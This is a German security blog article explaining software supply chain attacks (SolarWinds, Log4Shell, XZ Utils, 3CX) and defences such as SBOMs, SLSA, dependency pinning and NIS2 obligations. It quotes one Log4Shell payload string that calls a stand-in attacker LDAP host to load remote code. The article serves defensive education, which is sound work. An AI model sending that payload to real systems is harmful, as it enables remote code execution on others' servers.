Zum Inhalt springen

Services, Wiki-Artikel, Blog-Beiträge und Glossar-Einträge durchsuchen

↑↓NavigierenEnterÖffnenESCSchließen

Supply Chain Angriffe: SolarWinds, Log4Shell und die unsichtbare Bedrohung

Supply Chain Angriffe erklärt: wie SolarWinds, Log4Shell und XZ Utils funktionieren, warum sie so gefährlich sind, und wie Unternehmen ihre Software-Lieferkette absichern.

Inhaltsverzeichnis (7 Abschnitte)

Ein Unternehmen kann seine eigene IT perfekt absichern - und trotzdem kompromittiert werden, wenn ein vertrauenswürdiger Softwareanbieter zum Trojaner wird. Supply Chain Angriffe gehören zu den gefährlichsten Angriffsszenarien, weil sie legitime Vertrauensbeziehungen ausnutzen.

Was sind Supply Chain Angriffe?

Ein Supply Chain Angriff (Lieferkettenangriff) zielt nicht auf das Opfer direkt, sondern auf einen Lieferanten oder Dienstleister, dem das Opfer vertraut. Der Angreifer kompromittiert einen vorgelagerten Partner - und gelangt über diesen “durch die Hintertür” in das eigentliche Ziel.

Das Grundprinzip: Wenn ein Unternehmen einer Software vertraut und diese Software automatisch Updates einspielt, kann ein kompromittierter Update-Mechanismus zur Waffe werden.

ENISA-Studie (2021): In 66% der analysierten Supply Chain Angriffe fokussierten sich Angreifer auf den Softwareanbieter-Code - nicht auf die Liefermethode. Die Angreifer waren in Bezug auf Ressourcen und Fähigkeiten deutlich überlegen gegenüber den angegriffenen Unternehmen.

Die größten Supply Chain Angriffe der Geschichte

SolarWinds SUNBURST (2020)

Was passierte: Russische Geheimdienst-Hacker (APT29/Cozy Bear) kompromitierten die Build-Pipeline des IT-Monitoring-Anbieters SolarWinds. In den offiziellen Software-Updates für das Produkt “Orion” wurde bösartiger Code (SUNBURST-Backdoor) eingeschleust.

Ablauf:

  1. Angreifer erlangten Zugang zur Entwicklungsumgebung von SolarWinds (vermutlich 2019)
  2. Injektion von SUNBURST-Backdoor in den Build-Prozess
  3. Signierter, legitimer Orion-Softwareupdate mit Backdoor ausgeliefert
  4. ~18.000 Kunden installierten das kompromittierte Update - ohne es zu wissen
  5. Backdoor rief erst nach 2 Wochen nach Hause (Sandbox-Evasion)
  6. Gezielte Aktivierung bei hochwertigem Zielen: US-Finanzministerium, Pentagon, Sicherheitsfirmen

Entdeckung: Erst Monate später durch die Sicherheitsfirma FireEye - die selbst Opfer war.

Kosten: > 100 Millionen USD Behebungsaufwand, umfangreiche Geheimdienstschäden.

Log4Shell / Log4j (CVE-2021-44228)

Was passierte: Eine kritische Zero-Day-Schwachstelle in der weit verbreiteten Java-Logging-Bibliothek Log4j 2 ermöglichte Remote Code Execution mit minimalen Voraussetzungen.

Warum so schlimm: Log4j 2 war in Millionen von Java-Anwendungen eingebunden - oft als transitive Abhängigkeit, von der Entwickler gar nicht wussten. Durch das Abhängigkeitsproblem im Java-Ökosystem war es nahezu unmöglich, alle verwundeten Instanzen sofort zu finden.

Einfachheit des Exploits:

${jndi:ldap://angreifer.com/exploit}

Diese eine Zeichenkette, in einem Log-Feld eingegeben, reichte aus für RCE. Innerhalb von 72h nach Veröffentlichung beobachteten Sicherheitsfirmen Millionen von Exploitation-Versuchen.

Betroffene Systeme: Apache, Apple iCloud, Microsoft Azure, Steam, Twitter, Cloudflare, VMware, Cisco und zigtausende andere.

XZ Utils Backdoor (CVE-2024-3094)

Was passierte: Ein Angreifer unter dem Pseudonym “Jia Tan” verbrachte 2 Jahre damit, sich als vertrauenswürdiger Open-Source-Contributor in das Projekt XZ Utils zu etablieren - und baute dann eine Backdoor ein, kurz bevor sie in Produktions-Linux-Systemen weltweit ausgerollt worden wäre.

Besonderheit: Dieser Angriff zeigte, wie staatliche Akteure gezielt Open-Source-Communities infiltrieren - über Social Engineering, Geduld und langsamen Vertrauensaufbau.

Entdeckt: Durch Zufall von Microsoft-Ingenieur Andres Freund, der ungewöhnliche CPU-Auslastung im SSH-Prozess bemerkte.

3CX Supply Chain Angriff (2023)

3CX ist eine populäre VoIP-Software. Angreifer (Lazarus Group / Nordkorea) kompromitierten ein Update der Software - was zu einer Weiterkompromittierung mehrerer Fortune 500-Unternehmen führte.

Besonders: Die 3CX-Kompromittierung selbst war das Ergebnis einer vorgelagerten Kompromittierung eines 3CX-Mitarbeiters über Trading-Software (X_TRADER) - ein Supply Chain Angriff, der durch einen anderen Supply Chain Angriff ermöglicht wurde.

Angriffsvektoren im Detail

Kompromittierung der Build-Pipeline (CI/CD)

Quellcode → Build-System → Signierung → Distribution

            Angreifer injiziert
            bösartigen Code hier

Ziel: Einschleusung von Code, bevor die finale Binary signiert wird.

Kompromittierung von Paketregistries

  • npm: typosquatting, dependency confusion
  • PyPI: gefälschte Pakete mit ähnlichen Namen zu bekannten Libraries
  • RubyGems, Maven Central, NuGet

Dependency Confusion: Öffentliche Paket-Registry-Namen überschreiben interne private Pakete bei schlecht konfiguriertem Dependency Resolution.

Kompromittierung von Open-Source-Projekten

  • Übernahme eines verwaisenden, populären Projekts
  • Social Engineering gegen Maintainer (wie XZ Utils)
  • Pull Request mit verstecktem bösartigem Code

Kompromittierung von Entwickler-Workstations

  • Malware auf Entwickler-Laptop → Zugang zur Codebase
  • Secrets in Git-History → Zugang zu Production-Systemen

Schutzmaßnahmen: Software Supply Chain Security

Software Bill of Materials (SBOM)

Ein SBOM ist eine vollständige, maschinenlesbare Inventarliste aller Komponenten einer Software:

  • Alle direkten und transitiven Dependencies
  • Versions-Informationen
  • Lizenzinformationen

Formate: CycloneDX, SPDX, SWID Tags

Nutzen: Wenn eine neue Schwachstelle bekannt wird, kann sofort geprüft werden, welche eigenen Systeme betroffen sind. NIS2 und US-Executive Order 14028 fordern SBOMs für kritische Software.

SLSA - Supply Chain Levels for Software Artifacts

SLSA (ausgesprochen “salsa”) ist ein Framework zur Absicherung von Build-Pipelines, entwickelt von Google und der OpenSSF:

SLSA Level 0: Keine Garantien
SLSA Level 1: Dokumentierter Build-Prozess
SLSA Level 2: Tamper-evident Build mit Provenance
SLSA Level 3: Gehärtete Build-Plattform
SLSA Level 4: Hermetic, reproducible Builds

Jedes Level erhöht die Garantie, dass das gelieferte Artefakt tatsächlich aus dem deklarierten Quellcode entstanden ist.

Dependency Management Best Practices

✓ Dependency Pinning: Exakte Versionsnummern (nicht: ^1.2.3)
✓ Lock Files: package-lock.json, Cargo.lock, requirements.txt mit Hashes
✓ Dependency Review: PR-Checks bei neuen/aktualisierten Dependencies
✓ SCA-Tools: Snyk, Dependabot, GitHub Advanced Security
✓ Vulnerability Alerts: Automatische Notifications bei neuen CVEs in Dependencies
✓ Minimierung: So wenig Dependencies wie möglich

Vendor Risk Management

  • Sicherheitsfragebögen für Schlüssellieferanten
  • NIS2-Anforderungen an Lieferkettensicherheit (Art. 21)
  • Vertragsklauseln für Sicherheitsstandards und Meldepflichten bei Incidents
  • Monitoring von Lieferanten (OSINT, Security-Ratings-Dienste wie SecurityScorecard)

Zero Trust für Software-Lieferketten

  • Code Signing: Alle Releases mit Signaturen versehen (Sigstore/cosign für Open Source)
  • Artifact Verification: Signatur-Verifikation vor jeder Deployment
  • Least Privilege in CI/CD: Build-Pipelines bekommen nur minimal notwendige Secrets
  • Ephemeral Build Environments: Jeder Build in frischer, nicht persistenter Umgebung

SBOM und Schwachstellenmanagement verbinden

SBOM erstellen


Gegen CVE-Datenbanken abgleichen (OSV, NVD)


Betroffene Komponenten identifizieren


Update/Mitigationsplan erstellen


Deployment und Verifizierung

Regulatorische Anforderungen

NIS2

Art. 21 NIS2 fordert explizit Sicherheitsmaßnahmen in der Lieferkette als Pflichtbestandteil des Risikomanagements. Kritische und wichtige Einrichtungen müssen:

  • Lieferanten-Sicherheitsanforderungen definieren
  • Lieferanten nach Sicherheitsrisiken bewerten
  • Vertragliche Sicherheitsanforderungen einbeziehen

Cyber Resilience Act (CRA)

Der EU Cyber Resilience Act (2024 in Kraft getreten) verpflichtet Hersteller von Produkten mit digitalen Elementen zu:

  • SBOM für alle Produkte
  • Sicherheitsupdates für die gesamte Produktlebensdauer
  • Meldepflicht für aktiv ausgenutzte Schwachstellen

US Executive Order 14028

Für US-Bundesbehörden: verpflichtende SBOM-Anforderungen, SLSA-Empfehlungen, Secure-by-Design-Prinzipien für alle Softwarelieferanten.

Erkennung von Supply Chain Angriffen

Supply Chain Angriffe sind besonders schwer zu erkennen, weil die Angriffs-Payload aus einer vertrauenswürdigen Quelle stammt. Hinweise:

  • Unerklärliche Netzwerkverbindungen von legitimen Anwendungen zu unbekannten Hosts
  • Ungewöhnliche Prozesse die von bekannten Binaries gestartet werden
  • Code-Signing-Anomalien (anderes Zertifikat als üblich)
  • Build-Pipeline-Alarme (unerwartete Build-Artefakte, unautorisierte Änderungen)
  • Dependency-Graph-Veränderungen ohne entsprechende Code-Änderungen

EDR-Regeln für Supply Chain:

  • Alerts bei Software mit hohem Verbreitungsgrad die ungewöhnliche Prozesse starten
  • Monitoring von bekannter Verwaltungssoftware (RMM, Monitoring-Agents)

Fazit

Supply Chain Angriffe zeigen, dass die Sicherheit einer Organisation so stark ist wie ihre schwächste Vertrauensbeziehung. Das wichtigste Gegenparadigma ist Zero Trust: Kein Software-Artefakt, kein Update und kein Lieferant sollte automatisch als vertrauenswürdig gelten - auch wenn er eine gültige Signatur trägt. SBOMs, Dependency-Pinning, SLSA und robustes Vendor Risk Management sind die praktischen Werkzeuge, um die eigene Software-Lieferkette zu verstehen und abzusichern.

Quellen & Referenzen

  1. [1] CISA Advisory: SolarWinds Supply Chain Compromise - CISA
  2. [2] ENISA Threat Landscape for Supply Chain Attacks 2021 - ENISA
  3. [3] BSI: Sicherheit in der Softwarelieferkette - BSI
  4. [4] SLSA - Supply Chain Levels for Software Artifacts - Google / OpenSSF

Fragen zu diesem Thema?

Unsere Experten beraten Sie kostenlos und unverbindlich.

Erstberatung

Über den Autor

Jan Hörnemann
Jan Hörnemann

Chief Operating Officer · Prokurist

M.Sc. Internet-Sicherheit (if(is), Westfälische Hochschule). COO und Prokurist mit Expertise in Informationssicherheitsberatung und Security Awareness. Nachwuchsprofessor für Cyber Security an der FOM Hochschule, CISO-Referent bei der isits AG und Promovend am Graduierteninstitut NRW.

ISO 27001 Lead Auditor (PECB/TÜV) T.I.S.P. (TeleTrusT) ITIL 4 (PeopleCert) BSI IT-Grundschutz-Praktiker (DGI) Ext. ISB (TÜV) BSI CyberRisikoCheck CEH (EC-Council)
Dieser Artikel wurde zuletzt am 03.03.2026 bearbeitet. Verantwortlich: Jan Hörnemann, Chief Operating Officer · Prokurist bei AWARE7 GmbH. Lizenz: CC BY 4.0 — freie Nutzung mit Namensnennung: „AWARE7 GmbH, https://a7.de

Cookielose Analyse via Matomo (selbst gehostet, kein Tracking-Cookie). Datenschutzerklärung